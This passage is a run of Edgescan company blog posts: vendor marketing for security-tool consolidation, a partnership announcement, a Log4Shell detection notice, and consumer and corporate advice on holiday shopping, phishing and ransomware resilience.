stack contextualized intelligence AND remediation guidance into IT and Support Staff’s day-to-day workflow, you effectively make your IT Team security remediation all-stars. That’s Smart.   Reason 5 – Your Management Outlook Becomes Strategically “Smart” Security now has a strategic seat at the Enterprise Board Table. Armed with a singular and proactive approach to ensuring the Enterprise is resilient, the Security Team now partners with business teams to proactively ensure their optimal security posture is realized for each new business transformation exercise.   Like to learn more Why Smart VM Matters, click Read Whitepaper ### Five Reasons Why Hackers Do Not Want You to Consolidate Your Security Toolset While cost reduction and tool management bandwidth concerns might be why you are considering Security Tool Consolidation – the Hacker has a different agenda. They are counting on you to NOT consolidate your security tools – indeed their hacking success is highly dependent on you continuing with tool proliferation for a lot of reasons.  Here are Five from the perspective of the Hacker:   Reason 1 – Don’t Bother with Us - Focus on Compiling Reports It is good to set goals. Imagine how impressive it will be if your team dedicates itself manually compiling reports from all of your security scanning tools for each layer of the IT stack and you invest weeks if not months of time ensuring each scanning tool siloed results is contextualized against your other IT stack siloed results. Imagine how impressed your management will be that you have managed this quarter to hobble together a report smoothing over the fragmented picture of your Security Posture. And the great news is you get to do it all again next quarter. That’s the point of your security team isn’t it – compiling reports across your siloed point scanning tools, right? Us hackers can be out of sight and out of mind respectfully while you accomplish this important task.   Reason 2 – Tool Proliferation Noise is not a Distraction – It’s Your Day Job We know scanning tools create a lot of noise – false positives. We know that having different scanning tools for every IT layer generates exponentially even more noise. But if you want accuracy, then you have to owe up to the fact that you are going to be spending the bulk of your time ruling out false positives. Sorry, that’s your day job. And sorry if that takes the focus off our creative entrepreneurial activities. If that handicaps you against actually catching real vulnerabilities that we can exploit - we are ok with that.   Reason 3 – Automated Scanning Tools Spit out Alerts – Interpreting Broken Business Logic is Messy We are hackers. We are humans. It’s not easy finding ways to hack corporate systems. We have to think through how seemingly innocent exposures to say, a moth-balled application exposed to the public internet, combined with some creative thinking how small logical steps can gain us access to our prize. We do not want you to think about the logic. We want you 100% reliant on scanning tool reports. Even worse, we do not want you to bring in security expertise to anticipate how real attack surface vulnerabilities can be exploited. Focus on acquiring and managing more scanning point tools and enjoy the scale of alert generation and we will focus on breaking the business logic. Leave the messy human interpretation stuff to us.   Reason 4 – All Vulnerabilities are Created Equal If through a single full-stack integrated solution, you have access to a “single touchstone of truth”, then that’s not really fair. Your traditional procedure of stacking up all the discovered vulnerabilities from each of your security tool-generated alerts with no regard to their business significance helps make it an even playing field. Your attendance to vulnerabilities that do not really matter or better yet are not even actual vulnerabilities, gives us a chance to seize on those small windows of opportunities that really matter. If you consolidate your layered security tools into a single platform that can laser focus on those vulnerabilities that really matter across the entire attack surface continuously, then that takes us out of the game. And if you can automate business-ranked vulnerability alerts while ruling out false positives, then you are really taking the fun out of the game. So we say categorically “No” - in the spirit of fairness – keep the disparate tools, keep a generic list of all discovered vulnerabilities and manage them one by one and leave it to us to find things that really matter.   Reason 5 – Promptly Closing Vulnerability Tickets with All of Your Tool-Generated Alerts is Not Your Job It’s enough with your day job to manage the overhead of multiple security tools and discovering vulnerabilities themselves – surely you cannot be shouldering resolving the vulnerabilities themselves? That’s IT and Operations job. All you have to is take all of the vulnerability reports individually from each of your many scanning tool across your IT stack and individually send them to your IT and Operations team. They are perfectly equipped to sleuth through the hundreds, if not thousands of alerts generated with each tool, discern what requires the most attention and know exactly how to resolve them, including any broken business logic that could lead to a serious incident. And you can be rest assured that the IT and Operational Support Team primary job is NOT to optimizing business process and technologies to achieving their business goals and resolving their own user IT tickets. No, they live to pour through your heaps and heaps of multiple tool vulnerability reports and figure out how to resolve things that really matter. And while we wait for the fixes to happen across all of your tool-generated alerts between you and IT, we are certainly content to creatively leverage those important vulnerabilities that are not resolved. That lengthy step between vulnerability identification and remediation is what we live for. And if the step is longer when burdened with too many tools – all the better.   In Summary The hacker is a huge fan of  your multiple point solution approach. Tears of happiness were shed when Gartner confirmed that in 2021 “78% of Enterprises have 16 tools or more and 12% have 46 or more.”   Taking a step back and taking on the perspective of the hacker does make it more obvious that burdening your Vulnerability Management team (and your IT team) with a plethora of security tools gives the hacker unnecessary advantages to advancing their efforts. And yet Gartner tells us that Enterprises today simply have too many tools. The good news is that there are solutions and approaches that make Security Tool Consolidation and all its inherent benefits available today. If you would like to learn more how to achieve tool consolidation today, click Read Whitepaper ### Edgescan Announces Partnership With Manicode Edgescan Announces Partnership With Manicode To Deliver problem-based, Interactive, and Customizable Secure Coding Courses DUBLIN (03 Feb 2022) - Edgescan, the provider of the most comprehensive full-stack vulnerability management solution, today announces a partnership with Manicode Security, the secure coding education company. With a combination of lecture, security testing demonstration, and code review, Manicode classes are sure to entertain and educate app, web services, and mobile software developers and architects to the practices of secure development. Jim Manico is not your average trainer, nor is anyone in his team of highly qualified professors. With lessons delivered by Michelin-starred chefs with a PhD in computer science to talks that start with a headstand on stage, Manicode Security aims to make secure development training something that leaves the class energized and motivated. Their philosophy is that learning secure coding shouldn’t be a yawn-inducing, box-ticking exercise, but something that is memorable, engaging, and motivating. “I have followed Edgescan for years, and I’ve seen their technology mature”, said Jim Manico, founder of Manicode Security. “Their philosophy is in line with what I teach: it’s a no-nonsense approach, focused on delivering operational value and tangible results. I’m excited about this partnership and I look forward to seeing how their presence will grow in North America, as more and more organizations recognize the value of teaching the practices of secure coding and of embedding security into their processes.” “I'm glad to be back partnering with Jim, he’s a force of nature and an authority on all things software security,” said Eoin Keary, CEO and co-founder of Edgescan. “Security starts with education and should be integrated into coding practices, rather than an afterthought. The Edgescan platform combined with Manicode will deliver problem-based, focused security education based on the challenges faced by our clients. With Manicode we hope to continue to spread awareness and advocate for a culture of security across the board”.   About Manicode At Manicode Security, 100% of the focus is on teaching developers to write secure code. We bring a combination of passion, style, and decades of research into all of our education offerings. Jim Manico is the founder of Manicode Security where he trains software developers on secure coding and security engineering. He is also an investor/advisor for Nucleus Security, 10Security, BitDiscovery, KSOC and Inspectiv. Jim is a frequent speaker on secure software practices, is a member of the Java Champion community, and is the author of "Iron-Clad Java: Building Secure Web Applications" from Oracle Press. Jim also volunteers for the OWASP foundation as the project lead for the OWASP Application Security Verification Standard and the OWASP Cheatsheet Series.   About Edgescan Edgescan is an award-winning full-stack Attack Surface Management & Vulnerability Management Security as a Service (SaaS) solution. Edgescan™ protects & manages thousands of assets across the globe for both Fortune 500 and SME clients helping them to continuously detect, prioritize, monitor, and fix security weaknesses for Internet-facing systems, such as Web Applications, API’s, Network/Device systems and IoT services. Due to analyst validation of all discovered vulnerabilities, the solution is highly accurate and virtually false positive free. ### January 2022 Vulnerability Statistics Snapshot This year we are introducing a new way to keep the infosec community up to date on the latest vulnerabilities and the various CVEs associated with these vulnerabilities. We break down by Network/Device and Application/API and the percentages of each vulnerability that we have discovered during this month through the Edgescan platform. Follow the link below to get more information on the statistics that we have found in January 2022 through the Edgescan platform. If you want to learn more about the current vulnerability landscape, Edgesacn is hosting a webinar on the 18th of February with Eoin Keary and Jim Manico as they sit down and look through the preview of the 2022 Vulnerability Statistics Report and what we can expect for 2022 to bring. ### Five Reasons You Need to Consolidate Your Security Toolset Now You know you have too many security tools and you are on the edge of making a dedicated effort to consolidate now - Here’s Five Big Reasons to push you over the edge: Reason 1 – Cost The easy argument – there are so many ways you can reduce cost significantly, including – 1) tiered volume discounts and favourable terms with a single supplier 2) lower vendor management costs with fewer suppliers and contracts 3) less operational overhead and maintenance cost managing fewer tools 4) fewer support costs managing software updates across multiple tools and 5) less internal legal and procurement administrative costs managing multiple licenses and renewals. Yes, cost reduction is straightforward but it is not the most important reason.   Reason 2 – Operational Overhead The typical Vulnerability Management team has to spend considerable time and effort compiling alerts across all layers of the IT stack. A Smart Integrated Full Stack solution offers a consolidated and business-ranked alerting capability across the entire attack surface built into the platform. Your team spends less time compiling/validating and more time resolving issues.   Reason 3 – Remediation Efficiency Compiling alerts across the stack with single-point solutions not only robs you of precious operational bandwidth - it takes time – it is an extra step in the workflow. With alerts based on full-stack assessments integrated into IT’s daily operational support system, tickets get resolved quicker. It’s not about how many vulnerabilities you discover – it’s about how many you close, right?   Reason 4 – Security Staff Morale You already most likely have a recruiting challenge staffing your security team today. Why would you increase the attrition rate and lower staff morale by layering-in tool proliferation management onto the real security job – stopping attacks.   Reason 5 – Increased Resilience Well, you might have started vendor tool consolidation for traditional cost-cutting reasons but the real kicker and the crown jewel for security vendor consolidation is improved security posture.  “Having fewer security solutions can make it easier to properly configure them and respond to alerts, improving your security risk posture.” (Gartner 2020 CISO Effectiveness Survey)   Strengthening Vulnerability Management with NVM With Network Vulnerability Management (NVM), we help you consolidate your security tools into one streamlined solution, making vulnerability management more efficient. Our service simplifies monitoring and addressing vulnerabilities across your network, ensuring that your security posture remains robust. With operations in Dublin and New York, we provide a unified approach to security. ### Five Easy Steps to Achieving Security Tool Consolidation Now Your Tool Proliferation Problem is Both Serious and Fixable Step 1 – Recognize it is a Problem You are not alone. Gartner has concluded that in 2021, 78% of Enterprises have 16 tools or more and 12% have 46 or more. And the majority of them (80%) have identified vendor consolidation as a Top Three initiative. It’s a problem. It’s a real serious problem. It’s a problem you need to solve now. (Gartner Top Security and Risk Trends for 2021)   Step 2 – Break the Habits that Brought You Here As the Gartner report suggests it’s not unusual that you find yourself plagued with a tool proliferation problem. You and the majority of Enterprises have simply followed the path of acquiring specialized tools for each layer of the IT stack. And now you need to declutter and pivot from a pure point solution approach.   Step 3 – Ensure Everyone Appreciates the Value of Consolidation (and it’s not just costreduction) Usually there are compromises that need to be reached – one typically expects with tool consolidation that you sacrifice on the accuracy of the best of breed point solutions. The opposite is in fact the case. Gartner concludes that while Cost Reduction might initially be the driver – consolidation actually delivers both streamlined ops and lower security risk.   Step 4 – Start with Low Hanging Fruit - Embrace Smart Full Stack Platforms More than wishful thinking – there actually exists mature solutions that have been purpose-built from the ground up within a Full Stack paradigm. Edgescan is one such solution. Their full stack solution integrates expert verification with tuned scanning engines for Web application layer, Hosting Environment layer, Operating System of the Host, Host Machine Services and Underlaying Network. These are all modular so you can start to consolidate strategically with the layers that are important to you.   Step 5 – What is a Reasonable Expectation? Well of course every client’s initial complexity is different but on average the CISO can eliminate conservatively 25%. So for those with 46 tools that translates to ten to twelve tools eliminated. This is significant and can be realized within weeks of implementation. ### Log4Shell Quick Script Anyone wishing to do a quick test to see if Log4Shell Vulnerabilities are on your systems? James mullen has devised a handy little script to quickly test out if the vulnerability is present on any of your systems, you can get more information from our Github below:   https://github.com/BCCRiskAdvisory/log4shell-poc-py       ### Log4Shell Introduction It is rare that a vulnerability lives up to the hype, but CVE-2021-44228 aka Log4shell has exceeded expectations. This vulnerability allows unauthenticated remote code execution (RCE) and it is triggered when a specific string is processed and then parsed by the vulnerable Log4j logging component.   What we are doing If we discover this vulnerability on your environment, we will contact your directly. We have effective methods of discovering this vulnerability and we are running scans vs all customer environments. These scans are additive and running continuously, they run in parallel with your normal scanning and the detection methods are updated hourly.   How we are doing it edgescan is approaching this with every client as the highest priority. Our scans will continue to run with the following approach. A base request with the latest research and vectors. A unscheduled scan will take place after crawling the application for endpoints and parameters which will be tested to ensure full coverage of any logging that may take place within the depth of application. If a server is found to be vulnerable at this phase you our client is contacted to ensure both prompt notification and mitigation is in place. We follow this up with fuzzing the discovered endpoints and parameters with the latest bypass vectors. After the third phase is completed, we continue to discover and confirm full coverage as well as staying on top of both research and feeds for any additional mitigation bypasses.   Contact If the testing team discover a vulnerable instance on a customer’s organisation, we are directly contacting customers. If they hear nothing great, scans are happening and we haven’t discovered a vulnerable instance yet. API Security for Modern Threats The Log4Shell vulnerability reminded us of the risks lurking in APIs. Our API Security Testing service identifies and secures your API endpoints to prevent data breaches. With offices in Dublin and New York, we help you maintain secure integrations across your ecosystem. ### Edgescan’s Christmas Shopping Security Checklist Christmas is a busy time of year for everyone - running around buying presents, finishing end of year work tasks before a well-deserved break, and travelling around to meet up with loved ones for the festive period. While filled with joy and cheer, Christmas can be overwhelming, and it is easy to forget important tasks when you’re run off your feet.    The holiday period is also renowned for seeing spikes in cybercrime. Cybercriminals follow money trails of online gift shopping and take advantage of people left off guard as they relax during the holidays. After all, it’s easy to forget being cyber secure while tucking into a Christmas roast.    But, this is where lists really shine as the true stars of Christmas. Not only do they help remember any gifts or last-minute errands before the big day, but they also can protect you from any pesky cyber criminals working their way onto the naughty list and into your digital universe.     This year the edgescan team have put together the ultimate cybersecurity checklist so you can avoid any security stress this winter, helping to protect you against Christmas cybercrime:   Write an inventory of all your smart devices. A good first step is writing an inventory of all your smart devices. Smart devices that are constantly connected to the internet increase the risk of a security compromise. It is important to write an inventory of these devices so you are aware of them, how they can create access for cybercriminals, and how you can protect them.   Don’t use default passcodes to protect devices If you have a password protected device, make sure you change the default PINs or passcodes the device came with. The default passwords that are given in the device manual, are also in the same device manual the attackers have access to. This is especially important to remember when receiving devices as gifts during the festive period. Disconnect non-essential smart devices Once you have made your inventory, check which of these devices need to be connected to the internet, and which don’t need to take advantage of their connected functionalities. When you are left with the remaining connected devices, update these manually or define a window in which the device can access the internet and apply necessary updates.  Don’t forget your router Routers are incredibly insecure, and it is easy to forget about protecting them. It is always good practice to make sure your router is fully updated, so see this as your sign to book in regular reminders to run router updates.  Be wary of purchasing cheap connected devices online. It is especially important during the gifting period to be cautious of buying cheap connected devices online. It’s tempting to nab a good deal, but a device may only be discounted because the manufacturer has compromised on the product’s security functions. When you see a good deal on a connected device make sure you do your due diligence and find out if it is from a reputable manufacturer. Add non-sensitive smart devices to ‘guest’ networks If there are devices that don’t contain sensitive data (e.g coffee machine, fridge), then you can connect these devices to a separate network. By connecting these devices to what is essentially a ‘guest’ network, you are still able to use these devices, while separating them from more sensitive devices, such as laptops - adding in an extra layer of security.  Protect your privacy In order to protect your data while browning for gifts this year, always use a private browser window for “anonymous” browsing. When using a private window don’t sign into any websites and close them periodically.  Be aware of your device’s life cycle Being aware of your device's life cycle means you are also aware of when it needs patch updates, whether you can still use your product if the manufacturer ceases to exist, or if there is support available if your device goes wrong.  Happy holidays, and stay safe! Secure Your Holiday Shopping with DAST At Edgescan, we understand how critical it is to secure online transactions during the holiday shopping rush. Our Dynamic Application Security Testing (DAST) ensures that your e-commerce applications are protected against vulnerabilities, keeping your customers’ data safe. With offices in Dublin and New York, we provide global support to keep businesses secure during this peak shopping period. ### The ROI Dilemma in Cybersecurity The return on investment (ROI) for cybersecurity tools is a notoriously hard one to calculate. It’s a critical way to assess whether an investment is worth its price tag, but calculating how much a cybersecurity solution might save an organisation is a complicated matter.    Some calculate cybersecurity ROI by multiplying the average cost of a security incident by the number of cyberattacks that, statistically, would hit an organisation in any given time frame. Although this can give the board an idea of how much a certain cybersecurity solution might save the business, this remains an approximate calculation, which might not be entirely reflective of the value of an investment in security tools.    At Edgescan strives to give its customers the best value for their investment, and that includes being able to prove that the Edgescan full stack vulnerability platform saves them money and time. To help its customers visualise the ROI, the Edgescan platform provides some useful metrics that assess how many employees’ hours are saved by automating the process of vulnerability management across the fullstack.    But, there are many more returns on investment that don’t necessarily translate into a number. Some of the operational advantages that a cybersecurity solution can bring to an organisation are harder to quantify, but ultimately make a huge difference when it comes to streamlining security and avoid a breach.    Mean time to remediate (MTTR) The average time it takes organisations to patch a high risk network vulnerability is around 49 days. This number is consistent across small and large enterprises. The Edgescan platform tracks the MTTR of its clients and compares it to the average. This gives organisations a benchmark to compare their performance against, so that security teams can track how their patching policies have improved.    Creating a channel of communication between teams One of the main challenges facing security teams is communicating with IT, DevOps, and the rest of the team. Too often, cybersecurity operations use a language that only makes sense to security analysts, which makes it harder for teams to work together. It’s important for cybersecurity tools to simplify the interactions between teams, to promote collaboration and ensure that cybersecurity objectives are shared by the organisation as a whole.  For this reason, Edgescan has worked to make its platform as intuitive as it can be. Reporting, in particular, has been designed to be automated, seamless, and - most importantly - understandable.    Time saved At the end of the year, Edgescan provides its clients with an assessment of how many hours of their employees’ time the platform has saved. By automating the discovery and the assessment of vulnerabilities, security analysts are free to turn their attention to other matters, ultimately saving the business money. Additionally, by manually validating every vulnerability, Edgescan provides alerts that are virtually false positive free, thus avoiding false alarms that would waste personnel time.    Peace of mind Cybersecurity vendors can sometimes be hard to get a hold of. Especially with large vendors, the feedback of each individual client is rarely taken into account, and speaking with a human might require going through several steps of automated calls. Edgescan has made it a point to maintain the same hands-on approach with its clients as it had when we first started. We might have gotten bigger, but responding to clients’ queries and listening to what they have to say helps us improve and keep in touch with evolving security needs.    The average cost of a cyberattack easily surpasses the $1m mark, and avoiding falling victim to one is critical. At the same time, when looking for a cybersecurity tool, don’t just focus on the price tag - ask for what other benefits a solution could bring to your business. It’s essential for organisations to start seeing security as an opportunity to add operational value, rather than a necessary spend that is hard to justify.   Maximizing ROI with NVM At Edgescan, we help you maximize the ROI of your cybersecurity investments. Our Network Vulnerability Management (NVM) service delivers continuous monitoring and prioritization of risks, ensuring your resources are focused on what matters most. From Dublin to New York, we provide tailored solutions to optimize your security strategy. ### How to become a cybersecurity expert To become a doctor we need a medical degree, to become a lawyer we need to study law. But what about becoming a cybersecurity expert? IT Security is a relatively new sector and, despite the technical nature of the job, it welcomes people from all walks of life and with all sorts of academic and professional backgrounds. All it takes is passion, determination, and a lot of common sense.  Edgescan’s very own Dearbhail Kirwan has outlined the key steps that are necessary to become a cybersecurity expert and explains why there is no right or wrong route into this wonderfully fulfilling profession.  Don’t expect to know everything, but build a solid knowledge of the basics Theoretically, an expert should know about every technology, how to protect it, and how it can be abused or broken.  This is an unrealistic expectation to have; instead, the ability to combine existing knowledge with new information is what defines an expert. Learning the fundamentals and taking an interest in staying up to date with industry trends is a great place to start, and a strong understanding of the underlying concepts will certainly help when dealing with a new technology.  Remain hungry for knowledge Much like a doctor will need to attend conferences and learn about advancement in their field, cybersecurity experts need to stay on top of new technologies and continuously update their knowledge of attackers’ tactics. Learning is a part of the job, and a proactive and interested approach will serve you well in this respect.  Don’t rush it Exposure and practice in a variety of areas will help you figure out which area of cybersecurity interests you the most. From the outside, cybersecurity is homogeneous, but the roles within an IT security function vary dramatically. There are some things that can’t be learnt from books, which is why experience can be extremely valuable to help you gain skills and choose a speciality.  Training and Certifications  There is a wide array of cybersecurity certifications available, which can set you apart in many circumstances. The best certifications to get can change over time and differ depending on each individual's interests and goals. Research the areas you want to work in and what the most valued certifications for that area are. If you do not have a specific area that you are interested in, or do not have any existing relevant qualifications such as a degree, start with a general entry level cybersecurity certification.  We hope this guide helped you get an idea of what it takes to become a cybersecurity expert. What remains the most important quality to have, however, is common sense. Cybersecurity has to do with software vulnerabilities, logs, alerts and sophisticated pieces of malware, but more than anything else it has to do with people. It’s important to have the underlying knowledge of the technology to protect, but it’s equally important to know how to communicate effectively and to be able to prioritise what needs to be addressed first. And - when in doubt - just ask! Cybersecurity is a welcoming industry made of great people that will be more than happy to provide any guidance throughout your journey to become an expert.  By Dearbhail Kirwan, Information Security Consultant at Edgescan    Step into Cybersecurity with PTaaS We believe hands-on experience is key to mastering cybersecurity. That’s why our Penetration Testing as a Service (PTaaS) gives you the tools and insights to uncover vulnerabilities and learn real-world security practices. With locations in Dublin and New York, we support aspiring cybersecurity professionals globally. ### The oldest trick in the book still works: why phishing is here to stay The oldest trick in the book still works: why phishing is here to stay   Phishing might be one of the first forms of cybercrime that ever appeared. Some of the scams that were circulating in the early days of the internet have even entered popular culture - does everyone remember the story of the prince from far away who needed a bit of money, just to get him through to when he’d finally be granted access to his trust fund?    With time, users became savvier, but fraudsters’ tricks became more sophisticated. From spear-phishing to BEC scams, attackers have learnt that by doing some research and spending a little more time crafting their messages, they could use malicious emails - which are convenient and inexpensive - to make their way into organisations’ networks and either scam them for large sums or gain a beachhead from where to launch an attack.    As part of cybersecurity month, Edgescan has compiled a list of today’s most common phishing techniques, with some advice on how to prevent falling for cybercriminals’ tricks. Spoiler alert: user education features prominently!    Scam emails This type of phishing scam is the least sophisticated. It’s generally not very targeted, with the same message going out to a list of contacts (usually email addresses that have been exposed as part of a data breach), so a good way to spot one is to look for generic salutations. As part of this type of scam, fraudsters will impersonate a known brand that the recipient is likely to have a connection with. Amazon and Microsoft are all-time favourites, and so are tax collection agencies and other institutions most people will recognise. The email body will contain a call to action, such as clicking on a link to redeem a prize or to rectify a problem with an account. The link will then take the victim to a malicious domain, designed to steal the user’s data.    Tips: A language of urgency is always a red flag, and so are grammatical errors. Whenever in doubt, taking a little more time to validate that the sender is who they are purporting to be is always worth it: hover over a link to see if the URL directs to a webpage that looks real, and if in doubt type the address manually into the search bar. It’s important to inspect URLs carefully, as often attackers use omogliphs. For example, a fraudster impersonating the UK’s HMRC might create domains like www.hrnrc.co.uk, where the “m” is substituted by the similar looking “rn”.    Spear phishing Spear phishing is much more targeted, as it requires scammers to do some background research on their potential victims. These malicious emails are crafted to deceive a specific person, so they will contain a lot more personal information, such as their name, place of employment, job title, and more. Spear phishing is more common when attackers are aiming at an organisation, and are looking for a foothold into the network.    Tips: The best way to protect your organisation from spear phishing is user education. Fostering a culture that puts security first and rewards employees for taking the time to validate the legitimacy of a message goes a long way to minimise the success of phishers. Email filtering systems - often provided as a default by email hosting providers - can be set to flag any email coming from an external, unrecognised sender, and might be set to give a warning to users when they are about to download an attachment that should not be trusted.    BEC/CEO Fraud This type of phishing email is the most vicious to spot. It usually entails attackers compromising the email address of a top level executive, from which they will contact other employees and ask them to transfer funds to a certain account. Instead of the client's account, however, the money will land into the fraudsters’ pockets. This attack is subtler to spot because the malicious message comes from a trusted email address that the recipient will recognise.    Tips: in this case, too, education remains an organisations’ first line of defence. The fact that these scams continue to be effective is also somewhat aided by the fact that senior executives often don’t attend cybersecurity awareness training alongside other employees. It’s therefore important to extend those courses to the whole company, and to run them on a regular basis, as opposed to a one off.   Phishing attacks are here to stay because they offer fraudsters an easy and cost-effective way to launch an attack. The wealth of data exposed as part of the data breaches that make the news on a daily basis gives cybercriminals a huge pool of potential victims, who they can target conveniently with a Phishing-as-a-service tool, available for a few hundred dollars on the dark web. The only way to reduce attacks praying on the human factor is to make them unprofitable: only when it is no longer worthwhile for scammers to send malicious emails will they stop targeting our inboxes. Fighting Phishing with ASM Phishing remains a major threat, but at Edgescan, we help you fight back. Our Attack Surface Management (ASM) identifies and reduces your exposure to phishing attacks by mapping and securing your digital footprint. Whether you're in Dublin or New York, we help you stay resilient against evolving threats. ### Resilient to ransomware | Edgescan Whitepaper Special "Just some thoughts on what to do to be more resilient to ransomware. There is no silver bullet but the below may reduce the risk and impact if you’re unfortunate enough to be faced with a breach." Eoin Keary, CEO of Edgescan To read the whitepaper, check out the button below. ### Thoughts on what to do to be more resilient to ransomware Just some thoughts on what to do to be more resilient to ransomware. There is no silver bullet but the below may reduce the risk and impact if you’re unfortunate enough to be faced with a breach. God bless, take care 😉 Awareness & Resilience (and budget) Folks who write the cheques need to understand the value and importance of cyber security. Its not a "Tax" or an "Insurance" its a process to which we try to help ensure we are somewhat resilient to breach. Breach is 9 times out of 10 more expensive than multiple years of cyber spend. Embrace cyber security! "Hackers don't give a shit" and if you are weak you will be hit. Cyber-Resilience and awareness may not prevent breach but it may limit the extent of the breach and enable us to act in a timely manner before the genie is out of the bottle. Investment in cyber security is paramount due to the potential losses due to fraud and breach recovery. Compliance is not security, focus needs to be on practical technical controls and a technical framework. Asset Management and Attack surface Management - Identify and prioritize - Risk  Maintain a list of what assets you have (Data and systems), What's the bill of materials for your network or system? We can’t secure what we can’t measure. Tracking of system resilience is of key importance. Deploy continuous monitoring and management of your external Internet facing estate. This will help detect weaknesses and exposures as they arise. Real-time attack surface management is a simple but very effective solution to understand what can be hacked at any point in time. Establish an asset register and an IT BOM (Bill of materials). Identify critical assets (Systems and Data). Layer stronger controls around such systems. Perform  threat modelling exercises surrounding critical systems to identify cyber chokepoints and audit points to detect malice. Threat Awareness - Intelligence Deploy a solution to monitor lateral movement, brute forcing and typical indicators of compromise (IoC) traffic and artefacts. Threat awareness is important to both help detect post breach activities and also internal threats and weakness. Early detection is important in terms of limiting breach. Processing of logs. Maintaining of logs. Tracking what's important. Ensure we are auditing transactions, traffic and events on core systems. Such audit logs need to be consolidated and monitored for anomalies. Log scraping looking for errors and nonstandard events would be a great start. Logging non-idempotent transactions, authentication between users and systems and between systems themselves. Vulnerability Management Detect weaknesses as they occur. Patching, web application and API weaknesses. Exposed remote access services, administration consoles, weak cryptography all need to be tracked continuously. Key to this solution to be effective is accuracy. Solutions with guaranteed accuracy are preferred resulting in a reduction of "white-noise" so we can focus on real issues. The majority of ransomware leverages CVE's to exploit target systems. Full stack Vulnerability management makes systems more resilient to such attacks. Focus on a risk based approach to patching and addressing weakness. "All vulnerabilities are not created equal." focus on what matters; critical systems and data first, moving down the list. Penetration testing Hackers manually probe systems and they are expert operators. Using software alone to assess security is never going to work. To level the playing field we need to fight fire with fire. Today’s cybercrime consists of working professionals and industrialized capability. We need to be the same. Penetration testing consists of manual "deep dive" assessments using human intelligence simulating a determined attacker. Generally more effective in uncovering weakness but it is expensive and not as scalable. Metrics & Measure improvement Record improvement. What's difficult what's taking a long time. What cyber security activities are taking a long time and are challenging. Which systems cause the most cyber security effort. Which systems are historically more problematic and require the most attention. Which layer (network or application) has the highest risk density and where to we focus our efforts. Examine vulnerability types; be they patching, developer or architecture related. figure out the root cause to focus on training,  nd awareness in order to prevent such bugs and errors which manifest as weaknesses. Patch Every year 1000's of CVE (Common Vulnerabilities and Exposures) are discovered. Systems previously thought secure today suffer from a critical risk tomorrow. Constant tracking is required, constant vulnerability management to detect, risk based parching is required. Establish a patching programme. Use automation if possible. Email and Internet Browsing Security Locking down email systems, deploying an email security service to help minimize exposure.  Locking down users browsing access to a whitelist of legitimate sites. Data Encryption and secure Storage Data which is critical to the business, sensitive in nature of contains PII needs to be encrypted with a suitable key management solution in place. Passwords should be stored in an un-recoverable way (Salted-hashed). Backup Frequently Backing up of data and systems is undervalued and paramount to restoring after a breach. The frequency of backup has a bearing on loss. More frequent backups = Less window of exposure. Try to deploy a Realtime backup solution if possible. The backups should be stored in a secure part of the network which requires authentication etc. to limit the chance of malware affecting backup repositories. Authentication and Limitation & Zero Trust Enable multifactor authentication (MFA) for critical systems. Be it certificate based combined with password or other means. Ensure system-to-system authentication is also enabled, adopt a "Zero trust model".  IP limit traffic between systems from a architectural standpoint in order to make a network more hierarchical and less "flat". This can limit the spread of infection.   The extent of this problem is only growing based on the statistics we produce every year alongside other organizations. More statistics can be found here including the Verizon DBIR and Edgescan Vulnerability Stats Report 2021..... Eoin Keary CEO/Founder Edgescan http://ekeary.blogspot.com/   ### Eoin Keary's Analysis of 2021 DBIR Report The 2021 Verizon Data Breach Investigations Report (DBIR) was recently released and it is a great snapshot of the information security ecosystem as a whole. A portion of the report covers Web Application Hacking and System intrusion, both of which Edgescan provides protection against by continuous detection and vulnerability intelligence. Edgescan is a noted contributor (amongst many others) to the DBIR. We’ve provided curated vulnerability data for the last 3 years to the report. “We’re pretty happy to see so many correlations between the statistical models and have taken the liberty to put our spin on this industry-leading document, The Verizon DBIR report….”   ### Edgescan’s data for the greater good: the Verizon Business 2021 Data Breach Investigations Report is live For the third year running, Edgescan is proud to announce that it has contributed data to the Verizon Business 2021 Data Breach Investigations Report (2021 DBIR). Working in partnership with the DBIR team, Edgescan provided data on thousands of validated vulnerabilities across the full stack based on delivering tens-of-thousands of cyber security assessments globally in 2020. The data Edgescan provided reflected web, network, cloud and API vulnerability data across many verticals and many regions of the world, which we believe to be a true reflection on the state of cyber security and vulnerability management. “Edgescan’s vulnerability data continues to help us build a robust corpus of patching data that we used while writing the Asset section of the DBIR. We are pleased to work with Edgescan again this year and the company continues to be an excellent contributor to work with,” said Gabriel Bassett, Lead Data Scientist of the Verizon Business DBIR. With 29,207 quality incidents analysed, of which 5,258 were confirmed breaches, the 2021 DBIR provides a comprehensive snapshot of the state of cybersecurity globally and we are, of course, delighted to have taken part to this industry-wide effort to capture the challenges facing organisations. The Findings Perhaps unsurprisingly, the report found that the pandemic offered cybercriminals an opportunity to increase their efforts to monetise on the world’s state of crisis. Phishing and ransomware both thrived during the pandemic, with phishing increasing by 11 percent and ransomware by 6 percent. BEC scams, in particular, have shown to be on a steep increase, with attempts doubling compared to the previous year. In line with Edgescan’s own Vulnerability Stats Report, the 2021 DBIR found that web applications continue to make an appealing target for cybercriminals as organisations move their operations to the cloud. In fact, web application breaches represented 39 percent of all the breaches analysed. While Verizon Business found that security continues to be a challenge for organisations across all industries, each vertical had its own set of risks to face. According to the report, Financial and Healthcare sectors were riddled with Misdelivery breaches (55 and 36 percent, respectively). Public administration, on the other hand, seems to be the prime target for social engineering attacks aimed at stealing sensitive credentials. Interestingly, the human factor continues to be a necessary component of a successful breach, with 85% of security incidents analysed indicating the involvement of a human element. The Verizon Business DBIR is a chance for the cybersecurity industry to reflect on what they are doing right and where there is room for improvement. And the message is clear: attackers are more than ready to jump on any opportunity to make a quick profit, whether that means exploiting a global crisis or to attack critical infrastructure, as recent events have demonstrated. In light of this, it is ever more important for the cybersecurity industry as a whole to come together and join forces. We are delighted to have been able to provide our accurate, validated data to the folks at Verizon Business, whose hard work is incredibly important for defenders across the globe. Eoin Keary CEO/Founder Edgescan http://ekeary.blogspot.com/   ### Edgescan's new user dashboard won an iF Design award! We are thrilled here at Edgescan on winning yet another fantastic award, for our new user dashboard (https://edgescanstage.wpengine.com/introducing-edgescans-new-dashboard/). We are beaming with joy that our innovative UI design has been recognised again, having won the Good Design (https://edgescanstage.wpengine.com/edgescans-new-user-dashboard-won-an-if-design-award/) award back at the beginning of 2021. Without our Design Partners and all on Team Edgescan, these awards would not have happened. We thank you for all your hard work and creativity! ### Cybersecurity – Demonstrating Value to your Organization. (AKA How to Keep your Job as a CISO) In some walks of life, cybersecurity is considered a tax or an expense rather than an enabler. Looking at cybersecurity as a tax is similar to concluding that locks on doors or a credit card verification device is also a tax. A tax is something people feel they pay and get little in return, 